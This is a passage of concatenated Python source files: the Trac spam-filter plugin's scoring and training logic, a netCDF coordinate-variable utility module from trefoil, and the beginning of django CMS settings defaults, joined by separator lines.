IRejectHandler, 'FilterSystem',
"""The handler used to reject content.""", doc_domain='tracspamfilter')
isforwarded = BoolOption('spam-filter', 'is_forwarded', 'false',
"""Interpret X-Forwarded-For header for IP checks.""",
doc_domain='tracspamfilter')
spam_section = ConfigSection('spam-filter',
"""This section is used to handle all configurations used by
spam filter plugin.""", doc_domain='tracspamfilter')
def __init__(self):
"""Set up translation domain"""
try:
locale_dir = resource_filename(__name__, 'locale')
except KeyError:
pass
else:
add_domain(self.env.path, locale_dir)
# IRejectHandler methods
def reject_content(self, req, message):
raise RejectContent(message)
# Public methods
def test(self, req, author, changes):
"""Test a submission against the registered filter strategies.
@param req: the request object
@param author: the name of the logged in user, or 'anonymous' if the
user is not logged in
@param changes: a list of `(old_content, new_content)` tuples for every
modified "field", where `old_content` may contain the previous
version of that field (if available), and `new_content` contains
the newly submitted content
"""
start = time.time()
ip = req.remote_addr
if self.isforwarded:
x_forwarded = req.get_header('X-Forwarded-For')
if x_forwarded and x_forwarded != '':
ip = x_forwarded.split(',',1)[0]
if author.find("@") < 1:
trap = TrapFieldFilterStrategy(self.env).get_trap(req)
if trap:
if trap.find("@") > 0:
author += " <%s>" % trap
else:
self.log.debug("Append trap field to changes")
changes.append((None, trap))
score = 0
if self.trust_authenticated:
# Authenticated users are trusted
if req.authname and req.authname != 'anonymous':
return
reasons = []
outreasons = []
results = []
if req.authname and req.authname != 'anonymous':
reasons.append(("AuthenticatedUserScore", str(self.authenticated_karma),
N_("User is authenticated")))
score += self.authenticated_karma
if self.attachment_karma != 0 and \
req.args.get('attachment') is not None:
reasons.append(("AttachmentScore", str(self.attachment_karma),
N_("Attachment weighting")))
score += self.attachment_karma
if self.register_karma != 0 and (req.path_info == "/register" or req.args.get(TrapFieldFilterStrategy(self.env).name_register)):
reasons.append(("RegisterScore", str(self.register_karma),
N_("Registration weighting")))
score += self.register_karma
if not author:
author = 'anonymous'
self.log.debug("Spam testing for %s", req.path_info)
content = self._combine_changes(changes)
abbrev = shorten_line(content)
self.log.debug('Testing content %r submitted by "%s"', abbrev, author)
externals = []
obvious = False
for strategy in self.strategies:
tim = time.time()
try:
if not strategy.is_external():
retval = strategy.test(req, author, content, ip)
tim = time.time()-tim
if tim > 3:
self.log.warn('Test %s took %d seconds to complete.',
strategy, tim)
if retval:
points = retval[0]
if len(retval) > 2:
reason = retval[1] % retval[2:]
else:
reason = retval[1]
if points < 0:
if len(retval) > 2:
outreasons.append(gettext(retval[1]) % retval[2:])
else:
outreasons.append(gettext(retval[1]))
self.log.debug('Filter strategy %r gave submission %d '
'karma points (reason: %r)', strategy,
points, reason)
score += points
if reason:
name = get_strategy_name(strategy)
if name == "Bayesian" and float(retval[2]) > 90:
obvious = True
reasons.append((name, str(points)) + retval[1:])
results.append((strategy, points, tim))
else:
self._record_action('test','empty', '', strategy, tim)
elif self.use_external:
externals.append(strategy)
except Exception, e:
self._record_action('test', 'error', '', strategy, time.time()-tim)
self.log.exception('Filter strategy %s raised exception: %s', strategy, e)
extint = "testint"
if score > -self.skip_external and score < self.skip_externalham:
externals = Statistics(self.env).sortbyperformance(externals)
for strategy in externals:
tim = time.time()
try:
if score > -self.stop_external and score < self.stop_externalham:
extint = "testext"
retval = strategy.test(req, author, content, ip)
tim = time.time()-tim
if tim > 3:
self.log.warn('Test %s took %d seconds to '
'complete.', strategy, tim)
if retval:
points = retval[0]
if len(retval) > 2:
reason = retval[1] % retval[2:]
else:
reason = retval[1]
if points < 0:
if len(retval) > 2:
outreasons.append(gettext(retval[1]) % retval[2:])
else:
outreasons.append(gettext(retval[1]))
self.log.debug('Filter strategy %r gave submission %d '
'karma points (reason: %r)', strategy,
points, reason)
score += points
if reason:
name = get_strategy_name(strategy)
reasons.append((name,str(points)) + retval[1:])
results.append((strategy, points, tim))
else:
self._record_action('test','empty', '', strategy, tim)
except Exception, e:
self._record_action('test','error', '', strategy, time.time()-tim)
self.log.exception('Filter strategy %s raised exception: %s', strategy, e)
reasons = sorted(reasons, key=lambda r: r[0])
if score < self.min_karma:
type = "spam"
self._record_action(extint, 'spam', '', '', time.time()-start)
else:
type = "ham"
self._record_action(extint, 'ham', '', '', time.time()-start)
for strategy,points,tim in results:
if (points < 0 and score < self.min_karma) or (points > 0 and score >= self.min_karma):
status = "ok"
else:
status = "error"
self._record_action("test", type, status, strategy, tim)
if self.logging_enabled:
headers = '\n'.join(['%s: %s' % (k[5:].replace('_', '-').title(), v)
for k, v in req.environ.items()
if k.startswith('HTTP_')])
authenticated = req.authname and req.authname != 'anonymous'
rejected = score < self.min_karma
if not self.nolog_obvious or not obvious or authenticated or not rejected:
LogEntry(self.env, time.time(), req.path_info, author,
authenticated, ip, headers, content, rejected,
score, reasons, [req.path_info, req.args]).insert()
else:
self.log.debug('Skip %s %s %d', author, req.remote_addr, score)
type = "spam" if rejected else "ham"
status = "delete"
for strategy in self.strategies:
count = 0
name = get_strategy_name(strategy)
for r in reasons:
if r[0] == name:
count = as_int(r[1], 0)
break
if count:
spamstatus = count < 0
self._record_action(status, type, ("ok" if spamstatus == rejected else "error"), strategy, 0)
else:
self._record_action(status, type, '', strategy, 0)
self._record_action(status, type, '', '', 0)
LogEntry.purge(self.env, self.purge_age)
if score < self.min_karma:
self.log.debug('Rejecting submission %r by "%s" (%r) because it '
'earned only %d karma points (%d are required).',
abbrev, author, req.remote_addr, score, self.min_karma)
rejects = []
outreasons.sort()
for r in outreasons:
rejects.append(tag.li(r))
msg = tag.div(tag.ul(rejects), class_='message')
self.reject_handler.reject_content(req, msg)
def train(self, req, ids, spam=True, delete=False):
environ = {}
for name, value in req.environ.items():
if not name.startswith('HTTP_'):
environ[name] = value
if not isinstance(ids, list):
ids = [ids]
for log_id in ids:
start = time.time()
entry = LogEntry.fetch(self.env, log_id)
if entry:
extint = "trainint"
self.log.debug('Marking as %s: %r submitted by "%s"',
spam and 'spam' or 'ham',
shorten_line(entry.content),
entry.author)
fakeenv = environ.copy()
for header in entry.headers.splitlines():
name, value = header.split(':', 1)
if name == 'Cookie': # breaks SimpleCookie somehow
continue
cgi_name = 'HTTP_%s' % name.strip().replace('-', '_').upper()
fakeenv[cgi_name] = value.strip()
fakeenv['REQUEST_METHOD'] = 'POST'
fakeenv['PATH_INFO'] = entry.path
fakeenv['wsgi.input'] = StringIO('')
fakeenv['REMOTE_ADDR'] = entry.ipnr
if entry.authenticated:
fakeenv['REMOTE_USER'] = entry.author
type = "spam" if spam else "ham"
for strategy in self.strategies:
status = "trainskip"
if (self.use_external and self.train_external) or not strategy.is_external():
tim = time.time()
extint = "trainext"
res = strategy.train(Request(fakeenv, None),
entry.author or 'anonymous',
entry.content, entry.ipnr, spam=spam)
tim = time.time()-tim
if tim > 3:
self.log.warn('Training %s took %d seconds to '
'complete.', strategy, tim)
if res == -1:
status = "trainerror"
elif res == -2:
status = "traincond"
elif res > 0:
status = "train"
count = entry.findreasonvalue(get_strategy_name(strategy))
if count:
spamstatus = count < 0
self._record_action(status, type, ("ok" if spamstatus == spam else "error"), strategy, tim)
else:
self._record_action(status, type, '', strategy, tim)
self._record_action(extint, type, ("ok" if entry.rejected == spam else "error"), '', time.time()-start)
entry.update(rejected=spam)
if delete:
self.delete(req, log_id, True)
def delete(self, req, ids, stats):
if not isinstance(ids, list):
ids = [ids]
if stats:
for log_id in ids:
entry = LogEntry.fetch(self.env, log_id)
if entry:
type = "spam" if entry.rejected else "ham"
status = "delete"
for strategy in self.strategies:
count = entry.findreasonvalue(get_strategy_name(strategy))
if count:
spamstatus = count < 0
self._record_action(status, type, ("ok" if spamstatus == entry.rejected else "error"), strategy, 0)
else:
self._record_action(status, type, '', strategy, 0)
self._record_action(status, type, '', '', 0)
LogEntry.delete(self.env, ids)
def deleteobvious(self, req):
ids = LogEntry.getobvious(self.env)
if ids:
self.delete(req, ids, True)
# IEnvironmentSetupParticipant methods
def environment_created(self):
self.upgrade_environment()
def environment_needs_upgrade(self):
dbm = DatabaseManager(self.env)
return dbm.needs_upgrade(schema_version, schema_version_name)
def upgrade_environment(self):
dbm = DatabaseManager(self.env)
current_version = dbm.get_database_version(schema_version_name)
if not current_version:
dbm.create_tables(schema)
dbm.set_database_version(schema_version, schema_version_name)
else:
dbm.upgrade(schema_version, schema_version_name,
'tracspamfilter.upgrades')
# IPermissionRequestor methods
def get_permission_actions(self):
perms = ['SPAM_CONFIG', 'SPAM_MONITOR', 'SPAM_TRAIN', 'SPAM_USER',
'SPAM_REPORT', 'SPAM_CHECKREPORTS']
return perms + [('SPAM_ADMIN', perms)]
# ISystemInfoProvider methods
def get_system_info(self):
# Move implementation to httpbl, ip_blacklist and url_blacklist
# when support for Trac < 1.2 is dropped (#12294).
try:
import dns
except ImportError:
pass
else:
yield 'dnspython', get_pkginfo(dns)['version']
# Internal methods
def _combine_changes(self, changes, sep='\n\n'):
fields = []
for old_content, new_content in changes:
new_content = to_unicode(new_content)
if old_content:
old_content = to_unicode(old_content)
new_content = self._get_added_lines(old_content, new_content)
fields.append(new_content)
return sep.join(fields)
def _get_added_lines(self, old_content, new_content):
buf = []
old_lines = old_content.splitlines()
new_lines = new_content.splitlines()
matcher = SequenceMatcher(None, old_lines, new_lines)
for group in matcher.get_grouped_opcodes(0):
for tag, i1, i2, j1, j2 in group:
if tag in ('insert', 'replace'):
buf.append('\n'.join(new_lines[j1:j2]))
return '\n'.join(buf)
def _record_action(self, action, data, status, strategy, delay):
stats = Statistics(self.env)
if strategy:
name = get_strategy_name(strategy)
stats.insert_or_update(name, action, data, status, delay, 1 if strategy.is_external() else 0)
else:
stats.insert_or_update('', action, data, status, delay, None)
|
|
from bisect import bisect_left, bisect_right
import numpy
from datetime import date, datetime
import pytz
from affine import Affine
from netCDF4 import num2date, date2num, Variable
from pyproj import Proj
import six
from trefoil.geometry.bbox import BBox
from trefoil.utilities.proj import is_latlong
from trefoil.utilities.window import Window
from trefoil.netcdf.utilities import get_ncattrs
from trefoil.netcdf.crs import PROJ4_GEOGRAPHIC
class CoordinateVariable(object):
"""
Wraps a one-dimensional variable with the same name as a dimension
(http://www.unidata.ucar.edu/software/netcdf/docs/BestPractices.html).
"""
def __init__(self, input):
"""
A Coordinate Variable can be created from a netCDF dataset variable or a numpy array.
:param input: variable in a netCDF dataset or a numpy array
"""
self._ncattrs = dict()
if isinstance(input, Variable):
self.values = input[:]
for attr in input.ncattrs():
if not attr == '_FillValue':
self._ncattrs[attr] = input.getncattr(attr)
else:
self.values = input[:].copy()
def __len__(self):
return self.values.shape[0]
def is_ascending_order(self):
return self.values[0] < self.values[1]
def indices_for_range(self, start, stop):
"""
Returns the indices in this variable for the start and stop values
:param start: start value
:param stop: stop value
:return: start and stop indices
"""
assert stop > start
if start > self.values.max():
return self.values.size - 1, self.values.size - 1
elif stop < self.values.min():
return 0, 0
if self.is_ascending_order():
start_index = min(self.values.searchsorted(start), self.values.size - 1)
# Need to move 1 index to the left unless we matched an index closely (allowing for precision errors)
if start_index > 0 and not numpy.isclose(start, self.values[start_index]):
start_index -= 1
stop_index = min(self.values.searchsorted(stop), self.values.size - 1)
if not numpy.isclose(stop, self.values[stop_index]) and stop < self.values[stop_index]:
stop_index -= 1
return start_index, stop_index
else:
# If values are not ascending, they need to be reversed
temp = self.values[::-1]
start_index = min(temp.searchsorted(start), temp.size - 1)
if start_index > 0 and not numpy.isclose(start, temp[start_index]):
start_index -= 1
stop_index = min(temp.searchsorted(stop), temp.size - 1)
if not numpy.isclose(stop, temp[stop_index]) and stop < temp[stop_index]:
stop_index -= 1
size = self.values.size - 1
return max(size - stop_index, 0), max(size - start_index, 0)
def slice_by_range(self, start, stop):
"""
Slices a subset of values between start and stop values.
:param start: start value
:param stop: stop value
:return: sliced view of self.values. Make sure to copy this before altering it!
"""
assert stop > start
if start >= self.values.max() or stop <= self.values.min():
return numpy.array([])
start_index, stop_index = self.indices_for_range(start, stop)
return self.values[start_index:stop_index+1]
def add_to_dataset(self, dataset, name, is_unlimited=False, **kwargs):
"""
:param dataset: name of the dataset to add the dimension and variable to
:param name: name of the dimension and variable
:param is_unlimited: set the dimension as unlimited
:param kwargs: creation options for output variable. Should be limited to compression info.
:return: the newly created variable
"""
if name in dataset.variables:
raise Exception("Variable already exists in dataset")
if name in dataset.dimensions:
dimension = dataset.dimensions[name]
if is_unlimited != dimension.isunlimited() or len(self) != len(dimension):
raise Exception("Dimension already exists in dataset, but has different size")
else:
dimension_length = None if is_unlimited else len(self)
dataset.createDimension(name, dimension_length)
if 'fill_value' not in kwargs:
fill_value = getattr(self.values, 'fill_value', None)
if fill_value is not None:
kwargs['fill_value'] = fill_value
if self.values.dtype.char == 'S':
variable = dataset.createVariable(name, 'string', (name,), **kwargs)
# Have to write each index at a time, and cast to string. Not optimal but seems to be the only way allowed by netCDF4.
for index, value in enumerate(self.values):
variable[index] = str(value)
else:
variable = dataset.createVariable(name, self.values.dtype, (name,), **kwargs)
variable[:] = self.values[:]
for att, value in six.iteritems(self._ncattrs):
variable.setncattr(att, value)
return variable
class BoundsCoordinateVariable(CoordinateVariable):
"""
Wraps a two-dimensional variable representing bounds. Shape is always (N, 2).
Useful for representing time ranges, etc.
Example: http://www.cgd.ucar.edu/cms/eaton/netcdf/CF-20010629.htm#grid_ex4
"""
def is_ascending_order(self):
return self.values[0][0] < self.values[1][0]
def indices_for_range(self, start, stop):
raise NotImplementedError("Not yet implemented")
def add_to_dataset(self, dataset, name, is_unlimited=False, **kwargs):
"""
:param dataset: name of the dataset to add the dimension and variable to
:param name: name of the dimension and variable. Note: a new dimension for the bounds '_bnds' will be created.
:param is_unlimited: set the dimension as unlimited
:param kwargs: creation options for output variable. Should be limited to compression info.
:return: the newly created variable
"""
if name in dataset.variables:
raise Exception("Variable already exists in dataset")
bounds_dimension_name = '_bnds'
if bounds_dimension_name in dataset.dimensions:
if len(dataset.dimensions[bounds_dimension_name]) != 2:
raise ValueError('Bounds dimension _bnds is already present in dataset and not of size 2')
else:
dataset.createDimension(bounds_dimension_name, 2)
if name in dataset.dimensions:
dimension = dataset.dimensions[name]
if is_unlimited != dimension.isunlimited() or len(self) != len(dimension):
raise Exception("Dimension already exists in dataset, but has different size")
else:
dimension_length = None if is_unlimited else len(self)
dataset.createDimension(name, dimension_length)
fill_value = getattr(self.values, 'fill_value', None)
if fill_value is not None:
kwargs['fill_value'] = fill_value
variable = dataset.createVariable(name, self.values.dtype, (name,bounds_dimension_name), **kwargs)
variable[:] = self.values[:]
for att, value in six.iteritems(self._ncattrs):
variable.setncattr(att, value)
return variable
class SpatialCoordinateVariable(CoordinateVariable):
"""
Abstracts properties for a given spatial dimension (e.g., longitude).
Assumes that pixels follow a regular grid, and that dimension values represent centroids
"""
@property
def min(self):
return self.values.min()
@property
def max(self):
return self.values.max()
@property
def pixel_size(self):
return float(abs(self.values[1] - self.values[0]))
@property
def edges(self):
"""
Return coordinates of pixel edges from the min to the max
"""
pixel_size = self.pixel_size
if self.is_ascending_order():
temp = numpy.append(self.values, self.values[-1] + pixel_size)
else:
temp = numpy.append(self.values[0] + pixel_size, self.values)
return temp - (pixel_size / 2.0)
def get_offset_for_subset(self, coordinate_variable):
"""
Find the offset index of coordinate_variable within this coordinate variable.
This assumes that coordinate_variable is a subset of this one, and that coordinates and projections match.
"""
assert len(coordinate_variable) <= self.values.shape[0]
#TODO: make this a fuzzy match within a certain decimal precision
return list(self.values).index(coordinate_variable.values[0])
class SpatialCoordinateVariables(object):
"""
Encapsulates x and y coordinates with projection information
"""
def __init__(self, x, y, projection):
assert isinstance(x, SpatialCoordinateVariable)
assert isinstance(y, SpatialCoordinateVariable)
if projection is not None:
assert isinstance(projection, Proj)
self.x = x
self.y = y
self.projection = projection
@property
def shape(self):
return (len(self.y), len(self.x))
@property
def bbox(self):
half_x_pixel_size = self.x.pixel_size / 2.0
half_y_pixel_size = self.y.pixel_size / 2.0
return BBox(
(
self.x.min - half_x_pixel_size,
self.y.min - half_y_pixel_size,
self.x.max + half_x_pixel_size,
self.y.max + half_y_pixel_size
),
self.projection
)
@property
def affine(self):
bbox = self.bbox
return Affine(
self.x.pixel_size,
0, # Not used
bbox.xmin,
0, # Not used
self.y.values[1] - self.y.values[0], # Negative if y is descending
bbox.ymin if self.y.is_ascending_order() else bbox.ymax
)
@classmethod
def from_dataset(cls, dataset, x_name='longitude', y_name='latitude', projection=None):
"""
Return a SpatialCoordinateVariables object for a dataset
:param dataset: netCDF dataset
:param x_varname: name of the x dimension
:param y_varname: name of the y dimension
:param projection: pyproj Proj object
:return: CoordinateVariables instance
"""
#TODO: detect x and y names, and projection
if projection is None and x_name == 'longitude':
projection = Proj(PROJ4_GEOGRAPHIC)
return cls(
SpatialCoordinateVariable(dataset.variables[x_name]),
SpatialCoordinateVariable(dataset.variables[y_name]),
projection
)
@staticmethod
def from_bbox(bbox, x_size, y_size, dtype='float32', y_ascending=False):
"""
Return a SpatialCoordinateVariables object from BBox and dimensions
:param bbox: instance of a BBox, must have a projection
:param x_size: number of pixels in x dimension (width or number of columns)
:param y_size: number of pixels in y dimension (height or number of rows)
:param dtype: data type (string or numpy dtype object) of values
:param y_ascending: by default, y values are anchored from top left and are descending; if True, this inverts that order
:return: CoordinateVariables instance, assuming that rows are ordered in decreasing value
"""
assert isinstance(bbox, BBox)
if not bbox.projection:
raise ValueError('bbox projection must be defined')
x_pixel_size = (bbox.xmax - bbox.xmin) / float(x_size)
y_pixel_size = (bbox.ymax - bbox.ymin) / float(y_size)
x_arr = numpy.arange(x_size, dtype=dtype)
x_arr *= x_pixel_size
x_arr += (bbox.xmin + x_pixel_size / 2.0)
if y_ascending:
y_arr = numpy.arange(y_size, dtype=dtype)
y_arr *= y_pixel_size
y_arr += (bbox.ymin + y_pixel_size / 2.0)
else:
y_arr = numpy.arange(0, -y_size, -1, dtype=dtype)
y_arr *= y_pixel_size
y_arr += (bbox.ymax - y_pixel_size / 2.0)
x = SpatialCoordinateVariable(x_arr)
y = SpatialCoordinateVariable(y_arr)
return SpatialCoordinateVariables(x, y, bbox.projection)
def add_to_dataset(self, dataset, x_name, y_name, **kwargs):
x_var = self.x.add_to_dataset(dataset, x_name, **kwargs)
y_var = self.y.add_to_dataset(dataset, y_name, **kwargs)
x_var.setncattr('axis', 'X')
y_var.setncattr('axis', 'Y')
if self.projection:
if is_latlong(self.projection):
x_var.setncattr('standard_name', 'longitude')
x_var.setncattr('long_name', 'longitude')
x_var.setncattr('units', 'degrees_east')
y_var.setncattr('standard_name', 'latitude')
y_var.setncattr('long_name', 'latitude')
y_var.setncattr('units', 'degrees_north')
else:
x_var.setncattr('standard_name', 'projection_x_coordinate')
x_var.setncattr('long_name', 'x coordinate of projection')
y_var.setncattr('standard_name', 'projection_y_coordinate')
y_var.setncattr('long_name', 'y coordinate of projection')
def slice_by_bbox(self, bbox):
assert isinstance(bbox, BBox)
x_half_pixel_size = float(self.x.pixel_size)/2
y_half_pixel_size = float(self.y.pixel_size)/2
# Note: this is very sensitive to decimal precision.
x = SpatialCoordinateVariable(
self.x.slice_by_range(bbox.xmin + x_half_pixel_size, bbox.xmax - x_half_pixel_size)
)
y = SpatialCoordinateVariable(
self.y.slice_by_range(bbox.ymin + y_half_pixel_size, bbox.ymax - y_half_pixel_size)
)
return SpatialCoordinateVariables(x, y, self.projection)
def slice_by_window(self, window):
assert isinstance(window, Window)
x = SpatialCoordinateVariable(self.x.values[window.x_slice])
y = SpatialCoordinateVariable(self.y.values[window.y_slice])
return SpatialCoordinateVariables(x, y, self.projection)
def get_window_for_subset(self, subset_coordinates):
"""
return a Window representing offsets of subset_coordinates self within subset_coordinates.
Assumed to be in same projection, etc.
:param subset_coordinates: the coordinates of the subset within self
"""
assert isinstance(subset_coordinates, SpatialCoordinateVariables)
y_offset = self.y.get_offset_for_subset(subset_coordinates.y)
x_offset = self.x.get_offset_for_subset(subset_coordinates.x)
return Window((y_offset, len(subset_coordinates.y) + y_offset),
(x_offset, len(subset_coordinates.x) + x_offset))
def get_window_for_bbox(self, bbox):
"""
return a Window representing offsets of bbox within self
:param bbox: instance of bounding box representing coordinates to use for Window
:return: Window instance to extract data from within coordinate range of self
"""
assert isinstance(bbox, BBox)
y_half_pixel_size = float(self.y.pixel_size)/2
x_half_pixel_size = float(self.x.pixel_size)/2
y_offset, y_max = self.y.indices_for_range(bbox.ymin + y_half_pixel_size, bbox.ymax - y_half_pixel_size)
x_offset, x_max = self.x.indices_for_range(bbox.xmin + x_half_pixel_size, bbox.xmax - x_half_pixel_size)
return Window((y_offset, y_max + 1), (x_offset, x_max + 1))
class DateVariable(CoordinateVariable):
"""
Provides utility wrapper of a date variable, especially when stored according to CF convention.
If variable conforms to CF convention pattern (has units with 'since' in label and calendar) then
dates are extracted and converted to python date objects.
Dates are assumed to be sorted in ascending order.
"""
def __init__(self, input, units_start_date=date(2000, 1, 1), calendar='360_day'):
"""
Create from a variable with CF Convention units and calendar, or
an array of years.
If created from years, values are recorded on the first day of the month
for each year, and are exported using units of days (years not allowed
by CF convention. Lame).
"""
assert calendar in ('360_day', 'gregorian', 'standard', 'julian', '360', 'noleap')
super(DateVariable, self).__init__(input)
if isinstance(input, Variable):
attributes = get_ncattrs(input)
self.units = attributes.get('units', '').lower()
self.calendar = attributes.get('calendar', '').lower()
if self.units and self.calendar and 'since' in self.units.lower():
self.dates = num2date(self.values, self.units, self.calendar)
elif (self.units and 'year' in self.units) or 'year' in input._name.lower():
self.dates = numpy.array([datetime(y, 1, 1, tzinfo=pytz.UTC) for y in self.values.astype('int')])
else:
raise ValueError('Variable is missing required attributes: units, calendar')
else:
self.units = 'year' if self.unit == 'year' else '{0}s since {1}'.format(self.unit, str(units_start_date))
self.calendar = calendar
if self.values.dtype.kind in ('i', 'u', 'f'):
self.dates = numpy.array([datetime(y, 1, 1) for y in self.values])
elif isinstance(self.values[0], datetime):
self.dates = self.values.copy()
if self.unit == 'year':
self.values = numpy.array([x.year for x in self.values], dtype='int32')
else:
self.values = numpy.array(
date2num(self.dates, units=self.units, calendar=self.calendar), dtype=numpy.int32
)
@property
def datetimes(self):
"""
Convert to python datetimes if not done automatically (calendar not compatible with python datetimes).
Use with caution
"""
if isinstance(self.dates[0], datetime):
return self.dates
else:
return numpy.array([datetime(*d.timetuple()[:6], tzinfo=pytz.UTC) for d in self.dates])
@property
def unit(self):
def varies_by_year(x, y):
if y.year == x.year or (y - x).seconds != 0 or x.month != y.month or x.day != y.day:
return False
return True
def varies_by_month(x, y):
if x.month == y.month or (y - x).seconds != 0 or x.day != y.day:
return False
return True
datetimes = self.datetimes if not self.values.dtype == datetime else self.values
if all(varies_by_year(datetimes[i], datetimes[i-1]) for i in range(1, len(datetimes))):
return 'year'
elif all(varies_by_month(datetimes[i], datetimes[i-1]) for i in range(1, len(datetimes))):
return 'month'
deltas = datetimes[1:] - datetimes[:-1]
for unit, seconds in (('day', 86400), ('hour', 3600), ('minute', 60), ('second', 1)):
if any(x.seconds % seconds != 0 for x in deltas):
continue
break
return unit
def add_to_dataset(self, dataset, name, **kwargs):
variable = super(DateVariable, self).add_to_dataset(dataset, name, **kwargs)
for att in ('units', 'calendar'):
variable.setncattr(att, getattr(self, att))
def indices_for_range(self, start, stop):
"""
Returns the indices in this variable for the start and stop values. Data must be in ascending order
:param start: start value. Can be a date object or a year.
:param stop: stop value. Can be a date object or a year.
:return: start and stop indices
"""
if not self.is_ascending_order():
raise ValueError("Dates must be in ascending order")
if not isinstance(start, date):
start = date(start, 1, 1)
if not isinstance(stop, date):
stop = date(stop, 12, 31)
return numpy.searchsorted(self.dates, start), numpy.searchsorted(self.dates, stop)
|
|
# -*- coding: utf-8 -*-
from functools import update_wrapper
import os
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.utils.translation import ugettext_lazy as _
from django.utils.six.moves.urllib.parse import urljoin
from cms import constants
__all__ = ['get_cms_setting']
class VERIFIED: pass # need a unique identifier for CMS_LANGUAGES
def default(name):
def decorator(wrapped):
def wrapper():
if hasattr(settings, name):
return getattr(settings, name)
return wrapped()
update_wrapper(wrapper, wrapped)
return wrapped
return decorator
DEFAULTS = {
'TEMPLATE_INHERITANCE': True,
'DEFAULT_X_FRAME_OPTIONS': constants.X_FRAME_OPTIONS_INHERIT,
'TOOLBAR_SIMPLE_STRUCTURE_MODE': True,
'PLACEHOLDER_CONF': {},
'PERMISSION': False,
# Whether to use raw ID lookups for users when PERMISSION is True
'RAW_ID_USERS': False,
'PUBLIC_FOR': 'all',
'APPHOOKS': [],
'TOOLBARS': [],
'SITE_CHOICES_CACHE_KEY': 'CMS:site_choices',
'PAGE_CHOICES_CACHE_KEY': 'CMS:page_choices',
'MEDIA_PATH': 'cms/',
'PAGE_MEDIA_PATH': 'cms_page_media/',
'TITLE_CHARACTER': '+',
'PAGE_CACHE': True,
'PLACEHOLDER_CACHE': True,
'PLUGIN_CACHE': True,
'CACHE_PREFIX': 'cms-',
'PLUGIN_PROCESSORS': [],
'PLUGIN_CONTEXT_PROCESSORS': [],
'UNIHANDECODE_VERSION': None,
'UNIHANDECODE_DECODERS': ['ja', 'zh', 'kr', 'vn', 'diacritic'],
'UNIHANDECODE_DEFAULT_DECODER': 'diacritic',
'MAX_PAGE_PUBLISH_REVERSIONS': 10,
'MAX_PAGE_HISTORY_REVERSIONS': 15,
'TOOLBAR_ANONYMOUS_ON': True,
'TOOLBAR_URL__EDIT_ON': 'edit',
'TOOLBAR_URL__EDIT_OFF': 'edit_off',
'TOOLBAR_URL__BUILD': 'build',
'TOOLBAR_URL__DISABLE': 'toolbar_off',
'ADMIN_NAMESPACE': 'admin',
'APP_NAME': None,
'TOOLBAR_HIDE': False,
'INTERNAL_IPS': [],
'REQUEST_IP_RESOLVER': 'cms.utils.request_ip_resolvers.default_request_ip_resolver',
'PAGE_WIZARD_DEFAULT_TEMPLATE': constants.TEMPLATE_INHERITANCE_MAGIC,
'PAGE_WIZARD_CONTENT_PLUGIN': 'TextPlugin',
'PAGE_WIZARD_CONTENT_PLUGIN_BODY': 'body',
'PAGE_WIZARD_CONTENT_PLACEHOLDER': None, # Use first placeholder it finds.
}
def get_cache_durations():
"""
Returns the setting: CMS_CACHE_DURATIONS or the defaults.
"""
return getattr(settings, 'CMS_CACHE_DURATIONS', {
'menus': 60 * 60,
'content': 60,
'permissions': 60 * 60,
})
@default('CMS_MEDIA_ROOT')
def get_media_root():
return os.path.join(settings.MEDIA_ROOT, get_cms_setting('MEDIA_PATH'))
@default('CMS_MEDIA_URL')
def get_media_url():
return urljoin(settings.MEDIA_URL, get_cms_setting('MEDIA_PATH'))
@default('CMS_TOOLBAR_URL__EDIT_ON')
def get_toolbar_url__edit_on():
return get_cms_setting('TOOLBAR_URL__EDIT_ON')
@default('CMS_TOOLBAR_URL__EDIT_OFF')
def get_toolbar_url__edit_off():
return get_cms_setting('TOOLBAR_URL__EDIT_OFF')
@default('CMS_TOOLBAR_URL__BUILD')
def get_toolbar_url__build():
return get_cms_setting('TOOLBAR_URL__BUILD')
@default('CMS_TOOLBAR_URL__DISABLE')
def get_toolbar_url__disable():
return get_cms_setting('TOOLBAR_URL__DISABLE')
def get_templates():
from cms.utils.django_load import load_from_file
if getattr(settings, 'CMS_TEMPLATES_DIR', False):
tpldir = getattr(settings, 'CMS_TEMPLATES_DIR', False)
# CMS_TEMPLATES_DIR can either be a string poiting to the templates directory
# or a dictionary holding 'site: template dir' entries
if isinstance(tpldir, dict):
tpldir = tpldir[settings.SITE_ID]
# We must extract the relative path of CMS_TEMPLATES_DIR to the neares
# valid templates directory. Here we mimick what the filesystem and
# app_directories template loaders do
prefix = ''
# Relative to TEMPLATE['DIRS'] for filesystem loader
path = [template['DIRS'][0] for template in settings.TEMPLATES]
for basedir in path:
if tpldir.find(basedir) == 0:
prefix = tpldir.replace(basedir + os.sep, '')
break
# Relative to 'templates' directory that app_directory scans
if not prefix:
components = tpldir.split(os.sep)
try:
prefix = os.path.join(*components[components.index('templates') + 1:])
except ValueError:
# If templates is not found we use the directory name as prefix
# and hope for the best
prefix = os.path.basename(tpldir)
config_path = os.path.join(tpldir, '__init__.py')
# Try to load templates list and names from the template module
# If module file is not present skip configuration and just dump the filenames as templates
if os.path.isfile(config_path):
template_module = load_from_file(config_path)
templates = [(os.path.join(prefix, data[0].strip()), data[1]) for data in template_module.TEMPLATES.items()]
else:
templates = list((os.path.join(prefix, tpl), tpl) for tpl in os.listdir(tpldir))
else:
templates = list(getattr(settings, 'CMS_TEMPLATES', []))
if get_cms_setting('TEMPLATE_INHERITANCE'):
templates.append((constants.TEMPLATE_INHERITANCE_MAGIC, _('Inherit the template of the nearest ancestor')))
return templates
def _ensure_languages_settings(languages):
valid_language_keys = ['code', 'name', 'fallbacks', 'hide_untranslated', 'redirect_on_fallback', 'public']
required_language_keys = ['code', 'name']
simple_defaults = ['public', 'redirect_on_fallback', 'hide_untranslated']
if not isinstance(languages, dict):
raise ImproperlyConfigured(
"CMS_LANGUAGES must be a dictionary with site IDs and 'default'"
" as keys. Please check the format.")
defaults = languages.pop('default', {})
default_fallbacks = defaults.get('fallbacks')
needs_fallbacks = []
for key in defaults:
if key not in valid_language_keys:
raise ImproperlyConfigured("CMS_LANGUAGES has an invalid property in the default properties: %s" % key)
for key in simple_defaults:
if key not in defaults:
defaults[key] = True
for site, language_list in languages.items():
if site != hash(site):
raise ImproperlyConfigured(
"CMS_LANGUAGES can only be filled with integers (site IDs) and 'default'"
" for default values. %s is not a valid key." % site)
for language_object in language_list:
for required_key in required_language_keys:
if required_key not in language_object:
raise ImproperlyConfigured("CMS_LANGUAGES has a language which is missing the required key %r "
"in site %r" % (key, site))
language_code = language_object['code']
for key in language_object:
if key not in valid_language_keys:
raise ImproperlyConfigured(
